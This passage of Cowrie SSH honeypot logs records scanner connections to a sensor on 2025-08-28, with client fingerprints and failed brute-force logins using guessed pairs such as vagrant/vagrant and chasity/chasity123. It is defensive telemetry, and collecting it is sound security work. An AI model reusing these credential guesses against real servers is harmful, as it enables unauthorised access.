4","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:49:12.523234Z","src_ip":"51.79.164.132","session":"207795d01ae5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:49:13.097601Z","src_ip":"185.93.89.7","session":"c23226f87eaa"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T09:49:14.014458Z","src_ip":"51.79.164.132","session":"207795d01ae5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:49:15.695658Z","src_ip":"51.79.164.132","session":"207795d01ae5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43428,"dst_ip":"1.2.3.4","dst_port":22,"session":"652a61ec5256","protocol":"ssh","message":"New connection: 185.93.89.7:43428 (1.2.3.4:22) [session: 652a61ec5256]","sensor":"my-vps","timestamp":"2025-08-28T09:49:36.819465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:49:36.820465Z","src_ip":"185.93.89.7","session":"652a61ec5256"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:49:36.838178Z","src_ip":"185.93.89.7","session":"652a61ec5256"}
{"eventid":"cowrie.login.failed","username":"index","password":"aaaaaaaa","message":"login attempt [index/aaaaaaaa] failed","sensor":"my-vps","timestamp":"2025-08-28T09:49:36.876271Z","src_ip":"185.93.89.7","session":"652a61ec5256"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:49:37.897868Z","src_ip":"185.93.89.7","session":"652a61ec5256"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54738,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7303cdb7708","protocol":"ssh","message":"New connection: 51.79.164.132:54738 (1.2.3.4:22) [session: f7303cdb7708]","sensor":"my-vps","timestamp":"2025-08-28T09:49:38.242142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:49:38.803271Z","src_ip":"51.79.164.132","session":"f7303cdb7708"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:49:38.812734Z","src_ip":"51.79.164.132","session":"f7303cdb7708"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:49:42.797821Z","src_ip":"51.79.164.132","session":"f7303cdb7708"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:49:44.956824Z","src_ip":"51.79.164.132","session":"f7303cdb7708"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36944,"dst_ip":"1.2.3.4","dst_port":22,"session":"147b2c9d051c","protocol":"ssh","message":"New connection: 185.93.89.7:36944 (1.2.3.4:22) [session: 147b2c9d051c]","sensor":"my-vps","timestamp":"2025-08-28T09:50:01.565948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:01.567692Z","src_ip":"185.93.89.7","session":"147b2c9d051c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:50:01.608806Z","src_ip":"185.93.89.7","session":"147b2c9d051c"}
{"eventid":"cowrie.login.failed","username":"index","password":"welcome1","message":"login attempt [index/welcome1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:01.671409Z","src_ip":"185.93.89.7","session":"147b2c9d051c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:02.694422Z","src_ip":"185.93.89.7","session":"147b2c9d051c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":59600,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ff23c6ceca","protocol":"ssh","message":"New connection: 51.79.164.132:59600 (1.2.3.4:22) [session: 00ff23c6ceca]","sensor":"my-vps","timestamp":"2025-08-28T09:50:05.589421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:05.880376Z","src_ip":"51.79.164.132","session":"00ff23c6ceca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:50:05.892686Z","src_ip":"51.79.164.132","session":"00ff23c6ceca"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:10.030061Z","src_ip":"51.79.164.132","session":"00ff23c6ceca"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:11.779431Z","src_ip":"51.79.164.132","session":"00ff23c6ceca"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37782,"dst_ip":"1.2.3.4","dst_port":22,"session":"03d57d3fa8a1","protocol":"ssh","message":"New connection: 185.93.89.7:37782 (1.2.3.4:22) [session: 03d57d3fa8a1]","sensor":"my-vps","timestamp":"2025-08-28T09:50:26.037681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:26.039250Z","src_ip":"185.93.89.7","session":"03d57d3fa8a1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:50:26.058610Z","src_ip":"185.93.89.7","session":"03d57d3fa8a1"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwert","message":"login attempt [index/qwert] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:26.142699Z","src_ip":"185.93.89.7","session":"03d57d3fa8a1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:27.163137Z","src_ip":"185.93.89.7","session":"03d57d3fa8a1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ab89ccb9165","protocol":"ssh","message":"New connection: 51.79.164.132:43838 (1.2.3.4:22) [session: 6ab89ccb9165]","sensor":"my-vps","timestamp":"2025-08-28T09:50:32.038337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:32.204373Z","src_ip":"51.79.164.132","session":"6ab89ccb9165"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:50:32.766843Z","src_ip":"51.79.164.132","session":"6ab89ccb9165"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:34.239650Z","src_ip":"51.79.164.132","session":"6ab89ccb9165"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:35.725471Z","src_ip":"51.79.164.132","session":"6ab89ccb9165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63012,"dst_ip":"1.2.3.4","dst_port":22,"session":"6221869a0018","protocol":"ssh","message":"New connection: 212.227.125.160:63012 (1.2.3.4:22) [session: 6221869a0018]","sensor":"my-vps","timestamp":"2025-08-28T09:50:37.171837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:50:37.173170Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:50:37.289439Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity","message":"login attempt [chasity/chasity] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:38.191033Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity1","message":"login attempt [chasity/chasity1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:39.309970Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity123","message":"login attempt [chasity/chasity123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:40.783106Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity1234","message":"login attempt [chasity/chasity1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:41.902323Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.login.failed","username":"chasity","password":"chasity12345","message":"login attempt [chasity/chasity12345] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:43.029213Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:44.485467Z","src_ip":"212.227.125.160","session":"6221869a0018"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59358,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac2d1e36060a","protocol":"ssh","message":"New connection: 217.72.205.35:59358 (1.2.3.4:22) [session: ac2d1e36060a]","sensor":"my-vps","timestamp":"2025-08-28T09:50:44.860193Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:44.861291Z","src_ip":"217.72.205.35","session":"ac2d1e36060a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57352,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd7db434a251","protocol":"ssh","message":"New connection: 185.93.89.7:57352 (1.2.3.4:22) [session: bd7db434a251]","sensor":"my-vps","timestamp":"2025-08-28T09:50:49.900474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:49.904831Z","src_ip":"185.93.89.7","session":"bd7db434a251"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:50:49.932164Z","src_ip":"185.93.89.7","session":"bd7db434a251"}
{"eventid":"cowrie.login.failed","username":"index","password":"hahaha","message":"login attempt [index/hahaha] failed","sensor":"my-vps","timestamp":"2025-08-28T09:50:49.974823Z","src_ip":"185.93.89.7","session":"bd7db434a251"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:50:51.006243Z","src_ip":"185.93.89.7","session":"bd7db434a251"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35464,"dst_ip":"1.2.3.4","dst_port":22,"session":"30007022df1e","protocol":"ssh","message":"New connection: 51.79.164.132:35464 (1.2.3.4:22) [session: 30007022df1e]","sensor":"my-vps","timestamp":"2025-08-28T09:50:58.550959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:50:58.728669Z","src_ip":"51.79.164.132","session":"30007022df1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-ce